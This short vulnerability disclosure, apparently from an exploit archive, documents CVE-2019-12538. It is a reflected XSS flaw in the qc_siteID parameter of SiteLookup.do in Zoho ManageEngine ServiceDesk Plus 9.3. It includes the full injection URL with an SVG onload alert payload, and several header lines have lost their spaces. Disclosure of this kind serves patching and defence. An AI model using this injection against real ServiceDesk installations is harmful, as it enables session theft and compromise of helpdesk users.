# ExploitTitle:ZohoManageEngineServiceDeskPlus9.3Cross-SiteScripting via SiteLookup.do
# Date:2019-06-04
# ExploitAuthor:TarantulaTeam-VinCSS(a member of Vingroup)
# VendorHomepage: https://www.manageengine.com/products/service-desk
# Version:ZohoManageEngineServiceDeskPlus9.3
# CVE:CVE-2019-12538InformationDescription:An issue was discovered in ZohoManageEngineServiceDeskPlus9.3.There is XSS via the SiteLookup.do qc_siteID parameter
Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view